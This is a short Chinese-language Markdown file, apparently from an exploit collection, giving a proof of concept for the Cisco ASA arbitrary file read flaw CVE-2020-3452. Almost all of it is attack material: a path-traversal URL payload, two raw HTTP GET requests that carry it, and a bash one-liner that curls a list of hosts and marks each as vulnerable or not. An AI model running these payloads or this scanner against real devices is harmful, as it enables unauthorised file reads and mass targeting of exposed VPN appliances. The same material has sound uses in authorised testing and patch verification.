CISCO ASA任意文件读取漏洞 (CVE-2020-3452).md
1.15 KB / 2021-05-21 09:14:38
# CISCO ASA任意文件读取漏洞 (CVE-2020-3452)
POC:
```
/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../
```
```
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3494.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9
Cookie: webvpnlogin=1; webvpnLang=en
```
```
GET /+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../ HTTP/1.1
Host: 127.0.0.1
Content-Length: 2
```
从列表中单行检查CVE-2020-3452
```bash
while read DOM; do curl -s -k "https://$DOM/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q Cisco && echo [VULNERABLE] $DOM || echo [NOT VULNERABLE] $DOM; done < $1
```
ref:
https://forum.ywhack.com/thread-1419-1-7.html